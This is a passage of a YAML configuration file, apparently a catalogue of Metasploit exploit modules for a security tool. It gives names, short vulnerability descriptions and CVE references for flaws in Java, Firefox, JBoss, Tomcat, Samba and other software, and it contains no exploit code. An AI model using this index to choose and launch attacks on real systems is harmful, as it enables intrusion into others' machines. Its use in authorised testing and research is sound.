"61987" + - - BID + - "37985" + - - URL + - http://www.wireshark.org/security/wnpa-sec-2010-02.html + - - URL + - http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?view=diff&r1=31596&r2=28492&diff_format=h + path: extensions/metasploit/ + class: Msf_module +msf_veritas_netbackup_cmdexec: + enable: true + msf: true + msf_key: multi/misc/veritas_netbackup_cmdexec + name: VERITAS NetBackup Remote Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module allows arbitrary command execution on an\n\ + \t\t\t\tephemeral port opened by Veritas NetBackup, whilst an\n\ + \t\t\t\tadministrator is authenticated. The port is opened and\n\ + \t\t\t\tallows direct console access as root or SYSTEM from\n\ + \t\t\t\tany source address.\n\ + \t\t\t" + authors: + - - CVE + - 2004-1389 + - - OSVDB + - "11026" + - - BID + - "11494" + - - URL + - http://seer.support.veritas.com/docs/271727.htm + path: extensions/metasploit/ + class: Msf_module +msf_openview_omniback_exec: + enable: true + msf: true + msf_key: multi/misc/openview_omniback_exec + name: HP OpenView OmniBack II Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module uses a vulnerability in the OpenView Omniback II\n\ + \t\t\t\tservice to execute arbitrary commands. This vulnerability was\n\ + \t\t\t\tdiscovered by DiGiT and his code was used as the basis for this\n\ + \t\t\t\tmodule.\n\n\ + \t\t\t\tFor Microsoft Windows targets, due to module limitations, use the\n\ + \t\t\t\t\"unix/cmd/generic\" payload and set CMD to your command. You can only\n\ + \t\t\t\tpass a small amount of characters (4) to the command line on Windows.\n\ + \t\t\t" + authors: + - - CVE + - 2001-0311 + - - OSVDB + - "6018" + - - BID + - "11032" + - - URL + - http://www.securiteam.com/exploits/6M00O150KG.html + path: extensions/metasploit/ + class: Msf_module +msf_zend_java_bridge: + enable: true + msf: true + msf_key: multi/misc/zend_java_bridge + name: Zend Server Java Bridge Arbitrary Java Code Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module takes advantage of a trust relationship issue within the\n\ + \t\t\t\tZend Server Java Bridge. The Java Bridge is responsible for handling interactions\n\ + \t\t\t\tbetween PHP and Java code within Zend Server. \n\ + \t\t\t\t\n\ + \t\t\t\t\tWhen Java code is encountered Zend Server communicates with the Java Bridge. The\n\ + \t\t\t\tJava Bridge then handles the java code and creates the objects within the Java Virtual\n\ + \t\t\t\tMachine. This interaction however, does not require any sort of authentication. This\n\ + \t\t\t\tleaves the JVM wide open to remote attackers. Sending specially crafted data to the\n\ + \t\t\t\tJava Bridge results in the execution of arbitrary java code.\n\ + \t\t\t" + authors: + - - OSVDB + - "71420" + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-11-113/ + - - URL + - http://www.exploit-db.com/exploits/17078/ + path: extensions/metasploit/ + class: Msf_module +msf_php_unserialize_zval_cookie: + enable: true + msf: true + msf_key: multi/php/php_unserialize_zval_cookie + name: PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie) + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits an integer overflow vulnerability in the unserialize()\n\ + \t\t\t\tfunction of the PHP web server extension. This vulnerability was patched by\n\ + \t\t\t\tStefan in version 4.5.0 and applies all previous versions supporting this function.\n\ + \t\t\t\tThis particular module targets numerous web applications and is based on the proof\n\ + \t\t\t\tof concept provided by Stefan Esser. This vulnerability requires approximately 900k\n\ + \t\t\t\tof data to trigger due the multiple Cookie headers requirement. Since we\n\ + \t\t\t\tare already assuming a fast network connection, we use a 2Mb block of shellcode for\n\ + \t\t\t\tthe brute force, allowing quick exploitation for those with fast networks.\n\n\ + \t\t\t\tOne of the neat things about this vulnerability is that on x86 systems, the EDI register points\n\ + \t\t\t\tinto the beginning of the hashtable string. This can be used with an egghunter to\n\ + \t\t\t\tquickly exploit systems where the location of a valid \"jmp EDI\" or \"call EDI\" instruction\n\ + \t\t\t\tis known. The EDI method is faster, but the bandwidth-intensive brute force used by this\n\ + \t\t\t\tmodule is more reliable across a wider range of systems.\n\ + \t\t\t" + authors: + - - CVE + - 2007-1286 + - - OSVDB + - "32771" + - - URL + - http://www.php-security.org/MOPB/MOPB-04-2007.html + path: extensions/metasploit/ + class: Msf_module +msf_qtjava_pointer: + enable: true + msf: true + msf_key: multi/browser/qtjava_pointer + name: Apple QTJava toQTPointer() Arbitrary Memory Access + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits an arbitrary memory access vulnerability in the\n\ + \t\t\tQuicktime for Java API provided with Quicktime 7.\n\n\ + \t\t\t" + authors: + - - CVE + - 2007-2175 + - - OSVDB + - "34178" + - - BID + - "23608" + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-07-023.html + path: extensions/metasploit/ + class: Msf_module +msf_java_signed_applet: + enable: true + msf: true + msf_key: multi/browser/java_signed_applet + name: Java Signed Applet Social Engineering Code Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis exploit dynamically creates a .jar file via the\n\ + \t\t\t\tMsf::Exploit::Java mixin, then signs the it. The resulting\n\ + \t\t\t\tsigned applet is presented to the victim via a web page with\n\ + \t\t\t\tan applet tag. The victim's JVM will pop a dialog asking if\n\ + \t\t\t\tthey trust the signed applet.\n\ + \t\t\t\t\n\ + \t\t\t\tOn older versions the dialog will display the value of CERTCN\n\ + \t\t\t\tin the \"Publisher\" line. Newer JVMs display \"UNKNOWN\" when the\n\ + \t\t\t\tsignature is not trusted (i.e., it's not signed by a trusted\n\ + \t\t\t\tCA). The SigningCert option allows you to provide a trusted\n\ + \t\t\t\tcode signing cert, the values in which will override CERTCN.\n\ + \t\t\t\tIf SigningCert is not given, a randomly generated self-signed\n\ + \t\t\t\tcert will be used.\n\n\ + \t\t\t\tEither way, once the user clicks \"run\", the applet executes\n\ + \t\t\t\twith full user permissions.\n\ + \t\t\t" + authors: + - - URL + - http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf + - - URL + - http://www.spikezilla-software.com/blog/?p=21 + path: extensions/metasploit/ + class: Msf_module +msf_opera_historysearch: + enable: true + msf: true + msf_key: multi/browser/opera_historysearch + name: Opera historysearch XSS + category: Metasploit + description: "\n\ + \t\t\t\t\tCertain constructs are not escaped correctly by Opera's History\n\ + \t\t\t\tSearch results. These can be used to inject scripts into the\n\ + \t\t\t\tpage, which can then be used to modify configuration settings\n\ + \t\t\t\tand execute arbitrary commands. Affects Opera versions between\n\ + \t\t\t\t9.50 and 9.61.\n\ + \t\t\t" + authors: + - - CVE + - 2008-4696 + - - OSVDB + - "49472" + - - BID + - "31869" + - - URL + - http://www.opera.com/support/kb/view/903/ + path: extensions/metasploit/ + class: Msf_module +msf_java_trusted_chain: + enable: true + msf: true + msf_key: multi/browser/java_trusted_chain + name: Java Statement.invoke() Trusted Method Chain Exploit + category: Metasploit + description: "\n\ + \t\t\tThis module exploits a vulnerability in Java Runtime Environment\n\ + \t\t\tthat allows an untrusted method to run in a privileged context. The\n\ + \t\t\tvulnerability affects version 6 prior to update 19 and version 5\n\ + \t\t\tprior to update 23.\n\ + \t\t\t" + authors: + - - CVE + - 2010-0840 + - - OSVDB + - "63483" + - - URL + - http://slightlyrandombrokenthoughts.blogspot.com/2010/04/java-trusted-method-chaining-cve-2010.html + path: extensions/metasploit/ + class: Msf_module +msf_firefox_escape_retval: + enable: true + msf: true + msf_key: multi/browser/firefox_escape_retval + name: Firefox 3.5 escape() Return Value Memory Corruption + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a memory corruption vulnerability in the Mozilla\n\ + \t\t\t\tFirefox browser. This flaw occurs when a bug in the javascript interpreter\n\ + \t\t\t\tfails to preserve the return value of the escape() function and results in\n\ + \t\t\t\tuninitialized memory being used instead. This module has only been tested\n\ + \t\t\t\ton Windows, but should work on other platforms as well with the current\n\ + \t\t\t\ttargets.\n\ + \t\t\t" + authors: + - - CVE + - 2009-2477 + - - OSVDB + - "55846" + - - BID + - "35660" + - - URL + - https://bugzilla.mozilla.org/show_bug.cgi?id=503286 + path: extensions/metasploit/ + class: Msf_module +msf_opera_configoverwrite: + enable: true + msf: true + msf_key: multi/browser/opera_configoverwrite + name: Opera 9 Configuration Overwrite + category: Metasploit + description: "\n\ + \t\t\t\tOpera web browser in versions <= 9.10 allows unrestricted script\n\ + \t\t\t\taccess to its configuration page, opera:config, allowing an\n\ + \t\t\t\tattacker to change settings and potentially execute arbitrary\n\ + \t\t\t\tcode.\n\ + \t\t\t" + authors: + - - OSVDB + - "66472" + path: extensions/metasploit/ + class: Msf_module +msf_java_setdifficm_bof: + enable: true + msf: true + msf_key: multi/browser/java_setdifficm_bof + name: Sun Java JRE AWT setDiffICM Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a flaw in the setDiffICM function in the Sun JVM.\n\n\ + \t\t\t\tThe payload is serialized and passed to the applet via PARAM tags. It must be\n\ + \t\t\t\ta native payload.\n\n\ + \t\t\t\tThe effected Java versions are JDK and JRE 6 Update 16 and earlier,\n\ + \t\t\t\tJDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and\n\ + \t\t\t\tearlier, and SDK and JRE 1.3.1_26 and earlier.\n\n\ + \t\t\t\tNOTE: Although all of the above versions are reportedly vulnerable, only\n\ + \t\t\t\t1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.\n\ + \t\t\t" + authors: + - - CVE + - 2009-3869 + - - OSVDB + - "59710" + - - BID + - "36881" + - - URL + - http://sunsolve.sun.com/search/document.do?assetkey=1-66-270474-1 + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-09-078/ + path: extensions/metasploit/ + class: Msf_module +msf_java_calendar_deserialize: + enable: true + msf: true + msf_key: multi/browser/java_calendar_deserialize + name: Sun Java Calendar Deserialization Exploit + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a flaw in the deserialization of Calendar objects in the Sun JVM.\n\n\ + \t\t\t\tThe payload can be either a native payload which is generated as an executable and\n\ + \t\t\t\tdropped/executed on the target or a shell from within the Java applet in the target browser.\n\n\ + \t\t\t\tThe affected Java versions are JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16\n\ + \t\t\t\tand earlier, SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected).\n\ + \t\t\t" + authors: + - - CVE + - 2008-5353 + - - OSVDB + - "50500" + - - URL + - http://slightlyrandombrokenthoughts.blogspot.com/2008/12/calendar-bug.html + - - URL + - http://landonf.bikemonkey.org/code/macosx/CVE-2008-5353.20090519.html + - - URL + - http://blog.cr0.org/2009/05/write-once-own-everyone.html + - - URL + - http://sunsolve.sun.com/search/document.do?assetkey=1-26-244991-1 + path: extensions/metasploit/ + class: Msf_module +msf_mozilla_navigatorjava: + enable: true + msf: true + msf_key: multi/browser/mozilla_navigatorjava + name: Mozilla Suite/Firefox Navigator Object Code Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a code execution vulnerability in the Mozilla\n\ + \t\t\t\tSuite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit\n\ + \t\t\t\trequires the Java plugin to be installed.\n\ + \t\t\t" + authors: + - - CVE + - 2006-3677 + - - OSVDB + - "27559" + - - BID + - "19192" + - - URL + - http://www.mozilla.org/security/announce/mfsa2006-45.html + - - URL + - http://browserfun.blogspot.com/2006/07/mobb-28-mozilla-navigator-object.html + path: extensions/metasploit/ + class: Msf_module +msf_mozilla_compareto: + enable: true + msf: true + msf_key: multi/browser/mozilla_compareto + name: Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a code execution vulnerability in the Mozilla\n\ + \t\t\t\tSuite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit\n\ + \t\t\t\tmodule is a direct port of Aviv Raff's HTML PoC.\n\ + \t\t\t" + authors: + - - CVE + - 2005-2265 + - - OSVDB + - "17968" + - - BID + - "14242" + - - URL + - http://www.mozilla.org/security/announce/mfsa2005-50.html + path: extensions/metasploit/ + class: Msf_module +msf_java_rmi_connection_impl: + enable: true + msf: true + msf_key: multi/browser/java_rmi_connection_impl + name: Java RMIConnectionImpl Deserialization Privilege Escalation Exploit + category: Metasploit + description: "\n\ + \t\t\tThis module exploits a vulnerability in the Java Runtime Environment\n\ + \t\t\tthat allows to deserialize a MarshalledObject containing a custom\n\ + \t\t\tclassloader under a privileged context. The vulnerability affects\n\ + \t\t\tversion 6 prior to update 19 and version 5 prior to update 23.\n\ + \t\t\t" + authors: + - - CVE + - 2010-0094 + - - OSVDB + - "63484" + - - URL + - http://slightlyrandombrokenthoughts.blogspot.com/2010/04/java-rmiconnectionimpl-deserialization.html + path: extensions/metasploit/ + class: Msf_module +msf_java_getsoundbank_bof: + enable: true + msf: true + msf_key: multi/browser/java_getsoundbank_bof + name: Sun Java JRE getSoundbank file:// URI Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a flaw in the getSoundbank function in the Sun JVM.\n\n\ + \t\t\t\tThe payload is serialized and passed to the applet via PARAM tags. It must be\n\ + \t\t\t\ta native payload.\n\n\ + \t\t\t\tThe effected Java versions are JDK and JRE 6 Update 16 and earlier,\n\ + \t\t\t\tJDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and\n\ + \t\t\t\tearlier, and SDK and JRE 1.3.1_26 and earlier.\n\n\ + \t\t\t\tNOTE: Although all of the above versions are reportedly vulnerable, only\n\ + \t\t\t\t1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.\n\ + \t\t\t" + authors: + - - CVE + - 2009-3867 + - - OSVDB + - "59711" + - - BID + - "36881" + - - URL + - http://zerodayinitiative.com/advisories/ZDI-09-076/ + path: extensions/metasploit/ + class: Msf_module +msf_firefox_queryinterface: + enable: true + msf: true + msf_key: multi/browser/firefox_queryinterface + name: Firefox location.QueryInterface() Code Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a code execution vulnerability in the Mozilla\n\ + \t\t\t\tFirefox browser. To reliably exploit this vulnerability, we need to fill\n\ + \t\t\t\talmost a gigabyte of memory with our nop sled and payload. This module has\n\ + \t\t\t\tbeen tested on OS X 10.3 with the stock Firefox 1.5.0 package.\n\ + \t\t\t" + authors: + - - CVE + - 2006-0295 + - - OSVDB + - "22893" + - - BID + - "16476" + - - URL + - http://www.mozilla.org/security/announce/mfsa2006-04.html + path: extensions/metasploit/ + class: Msf_module +msf_itms_overflow: + enable: true + msf: true + msf_key: multi/browser/itms_overflow + name: Apple OS X iTunes 8.1.1 ITMS Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis modules exploits a stack-based buffer overflow in iTunes\n\ + \t\t\t\titms:// URL parsing. It is accessible from the browser and\n\ + \t\t\t\tin Safari, itms urls will be opened in iTunes automatically.\n\ + \t\t\t\tBecause iTunes is multithreaded, only vfork-based payloads should\n\ + \t\t\t\tbe used.\n\ + \t\t\t" + authors: + - - CVE + - 2009-0950 + - - OSVDB + - "54833" + - - URL + - http://support.apple.com/kb/HT3592 + - - URL + - http://redpig.dataspill.org/2009/05/drive-by-attack-for-itunes-811.html + path: extensions/metasploit/ + class: Msf_module +msf_wuftpd_site_exec_format: + enable: true + msf: true + msf_key: multi/ftp/wuftpd_site_exec_format + name: wu-ftpd SITE EXEC/INDEX Format String Vulnerability + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a format string vulnerability in versions of the\n\ + \t\t\t\tWashington University FTP server older than 2.6.1. By executing\n\ + \t\t\t\tspecially crafted SITE EXEC or SITE INDEX commands containing format\n\ + \t\t\t\tspecifiers, an attacker can corrupt memory and execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2000-0573 + - - OSVDB + - "11805" + - - BID + - "1387" + path: extensions/metasploit/ + class: Msf_module +msf_svnserve_date: + enable: true + msf: true + msf_key: multi/svn/svnserve_date + name: Subversion Date Svnserve + category: Metasploit + description: "\n\ + \t\t\t\t\tThis is an exploit for the Subversion date parsing overflow. This\n\ + \t\t\t\texploit is for the svnserve daemon (svn:// protocol) and will not work\n\ + \t\t\t\tfor Subversion over webdav (http[s]://). This exploit should never\n\ + \t\t\t\tcrash the daemon, and should be safe to do multi-hits.\n\n\ + \t\t\t\t**WARNING** This exploit seems to (not very often, I've only seen\n\ + \t\t\t\tit during testing) corrupt the subversion database, so be careful!\n\ + \t\t\t" + authors: + - - CVE + - 2004-0397 + - - OSVDB + - "6301" + - - BID + - "10386" + - - URL + - http://lists.netsys.com/pipermail/full-disclosure/2004-May/021737.html + - - MIL + - "68" + path: extensions/metasploit/ + class: Msf_module +msf_spree_searchlogic_exec: + enable: true + msf: true + msf_key: multi/http/spree_searchlogic_exec + name: Spreecommerce < 0.50.0 Arbitrary Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits an arbitrary command execution vulnerability in the\n\ + \t\t\t\t\tSpreecommerce API searchlogic. Unvalidated input is called via the \n\ + \t\t\t\t\tRuby send method allowing command execution.\n\ + \t\t\t" + authors: + - - OSVDB + - "71900" + - - URL + - http://www.spreecommerce.com/blog/2011/04/19/security-fixes/ + path: extensions/metasploit/ + class: Msf_module +msf_jboss_maindeployer: + enable: true + msf: true + msf_key: multi/http/jboss_maindeployer + name: JBoss JMX Console Deployer Upload and Execute + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module can be used to execute a payload on JBoss servers that have\n\ + \t\t\t\tan exposed \"jmx-console\" application. The payload is put on the server by\n\ + \t\t\t\tusing the jboss.system:MainDeployer functionality. To accomplish this, a\n\ + \t\t\t\ttemporary HTTP server is created to serve a WAR archive containing our\n\ + \t\t\t\tpayload. This method will only work if the target server allows outbound\n\ + \t\t\t\tconnections to us.\n\ + \t\t\t" + authors: + - - CVE + - 2007-1036 + - - CVE + - 2010-0738 + - - OSVDB + - "33744" + - - URL + - http://www.redteam-pentesting.de/publications/jboss + - - URL + - https://bugzilla.redhat.com/show_bug.cgi?id=574105 + path: extensions/metasploit/ + class: Msf_module +msf_jboss_bshdeployer: + enable: true + msf: true + msf_key: multi/http/jboss_bshdeployer + name: JBoss JMX Console Beanshell Deployer WAR upload and deployment + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module can be used to install a WAR file payload on JBoss servers that have\n\ + \t\t\t\tan exposed \"jmx-console\" application. The payload is put on the server by\n\ + \t\t\t\tusing the jboss.system:BSHDeployer\\'s createScriptDeployment() method.\n\ + \t\t\t" + authors: + - - CVE + - 2010-0738 + - - URL + - http://www.redteam-pentesting.de/publications/jboss + - - URL + - https://bugzilla.redhat.com/show_bug.cgi?id=574105 + path: extensions/metasploit/ + class: Msf_module +msf_sun_jsws_dav_options: + enable: true + msf: true + msf_key: multi/http/sun_jsws_dav_options + name: Sun Java System Web Server WebDAV OPTIONS Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in Sun Java Web Server prior to\n\ + \t\t\t\tversion 7 Update 8. By sending an \"OPTIONS\" request with an overly long\n\ + \t\t\t\tpath, attackers can execute arbitrary code. In order to reach the vulnerable\n\ + \t\t\t\tcode, the attacker must also specify the path to a directory with WebDAV\n\ + \t\t\t\tenabled.\n\n\ + \t\t\t\tThis exploit was tested and confirmed to work on Windows XP SP3 without DEP.\n\ + \t\t\t\tVersions for other platforms are vulnerable as well.\n\n\ + \t\t\t\tThe vulnerability was originally discovered and disclosed by Evgeny Legerov of\n\ + \t\t\t\tIntevydis.\n\ + \t\t\t" + authors: + - - CVE + - 2010-0361 + - - OSVDB + - "61851" + - - URL + - http://intevydis.blogspot.com/2010/01/sun-java-system-web-server-70u7-webdav.html + - - URL + - http://sunsolve.sun.com/search/document.do?assetkey=1-66-275850-1 + path: extensions/metasploit/ + class: Msf_module +msf_jboss_deploymentfilerepository: + enable: true + msf: true + msf_key: multi/http/jboss_deploymentfilerepository + name: JBoss Java Class DeploymentFileRepository WAR deployment + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module uses the DeploymentFileRepository class in\n\ + \t\t\t\tJBoss Application Server (jbossas) to deploy a JSP file\n\ + \t\t\t\tin a minimal WAR context.\n\ + \t\t\t" + authors: + - - CVE + - 2010-0738 + - - URL + - http://www.redteam-pentesting.de/publications/jboss + - - URL + - https://bugzilla.redhat.com/show_bug.cgi?id=574105 + path: extensions/metasploit/ + class: Msf_module +msf_freenas_exec_raw: + enable: true + msf: true + msf_key: multi/http/freenas_exec_raw + name: FreeNAS exec_raw.php Arbitrary Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits an arbitrary command execution flaw\n\ + \t\t\t\tin FreeNAS 0.7.2 < rev.5543. When passing a specially formatted URL\n\ + \t\t\t\tto the exec_raw.php page, an attacker may be able to execute arbitrary\n\ + \t\t\t\tcommands.\n\n\ + \t\t\t\tNOTE: This module works best with php/meterpreter payloads.\n\ + \t\t\t" + authors: + - - URL + - http://sourceforge.net/projects/freenas/files/stable/0.7.2/NOTES%200.7.2.5543.txt/download + path: extensions/metasploit/ + class: Msf_module +msf_axis2_deployer: + enable: true + msf: true + msf_key: multi/http/axis2_deployer + name: Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP) + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module logs in to an Axis2 Web Admin Module instance using a specific user/pass\n\ + \t\t\t\tand uploads and executes commands via deploying a malicious web service by using SOAP.\n\ + \t\t\t" + authors: + - - URL + - http://www.rapid7.com/security-center/advisories/R7-0037.jsp + - - URL + - http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf + - - CVE + - 2010-0219 + path: extensions/metasploit/ + class: Msf_module +msf_axis2_deployer_rest: + enable: true + msf: true + msf_key: multi/http/axis2_deployer_rest + name: Axis2 Authenticated Code Execution (via REST) + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module logs in to an Axis2 Web Admin Module instance using a specific user/pass\n\ + \t\t\t\tand uploads and executes commands via deploying a malicious web service by using REST.\n\ + \t\t\t" + authors: + - - URL + - http://www.rapid7.com/security-center/advisories/R7-0037.jsp + - - URL + - http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf + - - CVE + - 2010-0219 + path: extensions/metasploit/ + class: Msf_module +msf_tomcat_mgr_deploy: + enable: true + msf: true + msf_key: multi/http/tomcat_mgr_deploy + name: Apache Tomcat Manager Application Deployer Authenticated Code Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module can be used to execute a payload on Apache Tomcat servers that\n\ + \t\t\t\thave an exposed \"manager\" application. The payload is uploaded as a WAR archive\n\ + \t\t\t\tcontaining a jsp application using a PUT request.\n\n\ + \t\t\t\tThe manager application can also be abused using /manager/html/upload, but that\n\ + \t\t\t\tmethod is not implemented in this module.\n\ + \t\t\t" + authors: + - - CVE + - 2009-3843 + - - OSVDB + - "60317" + - - CVE + - 2009-4189 + - - OSVDB + - "60670" + - - CVE + - 2009-4188 + - - BID + - "38084" + - - CVE + - 2010-0557 + - - URL + - http://www-01.ibm.com/support/docview.wss?uid=swg21419179 + - - CVE + - 2010-4094 + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-10-214/ + - - CVE + - 2009-3548 + - - OSVDB + - "60176" + - - BID + - "36954" + - - URL + - http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html + path: extensions/metasploit/ + class: Msf_module +msf_describe: + enable: true + msf: true + msf_key: multi/realserver/describe + name: RealServer Describe Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a buffer overflow in RealServer 7/8/9\n\ + \t\t\t\tand was based on Johnny Cyberpunk's THCrealbad exploit. This\n\ + \t\t\t\tcode should reliably exploit Linux, BSD, and Windows-based\n\ + \t\t\t\tservers.\n\ + \t\t\t" + authors: + - - CVE + - 2002-1643 + - - OSVDB + - "4468" + - - URL + - http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html + path: extensions/metasploit/ + class: Msf_module +msf_ntp_overflow: + enable: true + msf: true + msf_key: multi/ntp/ntp_overflow + name: NTP daemon readvar Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack based buffer overflow in the\n\ + \t\t\t\tntpd and xntpd service. By sending an overly long 'readvar'\n\ + \t\t\t\trequest it is possible to execute code remotely. As the stack\n\ + \t\t\t\tis corrupted, this module uses the Egghunter technique.\n\ + \t\t\t" + authors: + - - CVE + - 2001-0414 + - - OSVDB + - "805" + - - BID + - "2540" + - - US-CERT-VU + - "970472" + path: extensions/metasploit/ + class: Msf_module +msf_peazip_command_injection: + enable: true + msf: true + msf_key: multi/fileformat/peazip_command_injection + name: PeaZip <= 2.6.1 Zip Processing Command Injection + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a command injection vulnerability in PeaZip. All\n\ + \t\t\t\tversions prior to 2.6.2 are suspected vulnerable. Testing was conducted with\n\ + \t\t\t\tversion 2.6.1 on Windows.\n\n\ + \t\t\t\tIn order for the command to be executed, an attacker must convince someone to\n\ + \t\t\t\topen a specially crafted zip file with PeaZip, and access the specially file via\n\ + \t\t\t\tdouble-clicking it. By doing so, an attacker can execute arbitrary commands\n\ + \t\t\t\tas the victim user.\n\ + \t\t\t" + authors: + - - CVE + - 2009-2261 + - - OSVDB + - "54966" + - - URL + - http://peazip.sourceforge.net/ + - - URL + - http://www.exploit-db.com/exploits/8881 + path: extensions/metasploit/ + class: Msf_module +msf_adobe_u3d_meshcont: + enable: true + msf: true + msf_key: multi/fileformat/adobe_u3d_meshcont + name: Adobe U3D CLODProgressiveMeshDeclaration Array Overrun + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits an array overflow in Adobe Reader and Adobe Acrobat.\n\ + \t\t\t\tAffected versions include < 7.1.4, < 8.1.7, and < 9.2. By creating a\n\ + \t\t\t\tspecially crafted pdf that a contains malformed U3D data, an attacker may\n\ + \t\t\t\tbe able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2009-2990 + - - OSVDB + - "58920" + - - BID + - "36665" + - - URL + - http://sites.google.com/site/felipeandresmanzano/ + - - URL + - http://www.adobe.com/support/security/bulletins/apsb09-15.html + path: extensions/metasploit/ + class: Msf_module +msf_maple_maplet: + enable: true + msf: true + msf_key: multi/fileformat/maple_maplet + name: Maple Maplet File Creation and Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module harnesses Maple's ability to create files and execute commands\n\ + \t\t\t\tautomatically when opening a Maplet. All versions up to 13 are suspected\n\ + \t\t\t\tvulnerable. Testing was conducted with version 13 on Windows. Standard security\n\ + \t\t\t\tsettings prevent code from running in a normal maple worksheet without user\n\ + \t\t\t\tinteraction, but those setting do not prevent code in a Maplet from running.\n\n\ + \t\t\t\tIn order for the payload to be executed, an attacker must convince someone to\n\ + \t\t\t\topen a specially modified .maplet file with Maple. By doing so, an attacker can\n\ + \t\t\t\texecute arbitrary code as the victim user.\n\ + \t\t\t" + authors: + - - OSVDB + - "64541" + - - URL + - http://www.maplesoft.com/products/maple/ + path: extensions/metasploit/ + class: Msf_module +msf_handler: + enable: true + msf: true + msf_key: multi/handler + name: Generic Payload Handler + category: Metasploit + description: "\n\ + \t\t\t\tThis module is a stub that provides all of the\n\ + \t\t\t\tfeatures of the Metasploit payload system to exploits\n\ + \t\t\t\tthat have been launched outside of the framework.\n\ + \t\t\t" + authors: [] + + path: extensions/metasploit/ + class: Msf_module +msf_nttrans: + enable: true + msf: true + msf_key: multi/samba/nttrans + name: Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module attempts to exploit a buffer overflow vulnerability present in\n\ + \t\t\t\tversions 2.2.2 through 2.2.6 of Samba.\n\n\ + \t\t\t\tThe Samba developers report this as:\n\ + \t\t\t\t\"Bug in the length checking for encrypted password change requests from clients.\"\n\n\ + \t\t\t\tThe bug was discovered and reported by the Debian Samba Maintainers.\n\ + \t\t\t" + authors: + - - CVE + - 2003-0085 + - - OSVDB + - "6323" + - - BID + - "7106" + - - URL + - http://www.samba.org/samba/history/samba-2.2.7a.html + path: extensions/metasploit/ + class: Msf_module +msf_usermap_script: + enable: true + msf: true + msf_key: multi/samba/usermap_script + name: Samba "username map script" Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a command execution vulerability in Samba\n\ + \t\t\t\tversions 3.0.20 through 3.0.25rc3 when using the non-default\n\ + \t\t\t\t\"username map script\" configuration option. By specifying a username\n\ + \t\t\t\tcontaining shell meta characters, attackers can execute arbitrary\n\ + \t\t\t\tcommands.\n\n\ + \t\t\t\tNo authentication is needed to exploit this vulnerability since\n\ + \t\t\t\tthis option is used to map usernames prior to authentication!\n\ + \t\t\t" + authors: + - - CVE + - 2007-2447 + - - OSVDB + - "34700" + - - BID + - "23972" + - - URL + - http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534 + - - URL + - http://samba.org/samba/security/CVE-2007-2447.html + path: extensions/metasploit/ + class: Msf_module +msf_xtacacsd_report: + enable: true + msf: true + msf_key: freebsd/tacacs/xtacacsd_report + name: XTACACSD <= 4.1.2 report() Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in XTACACSD <= 4.1.2. By\n\ + \t\t\t\tsending a specially crafted XTACACS packet with an overly long\n\ + \t\t\t\tusername, an attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2008-7232 + - - OSVDB + - "58140" + - - URL + - http://aluigi.altervista.org/adv/xtacacsdz-adv.txt + path: extensions/metasploit/ + class: Msf_module +msf_cleanup_exec: + enable: true + msf: true + msf_key: hpux/lpd/cleanup_exec + name: HP-UX LPD Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis 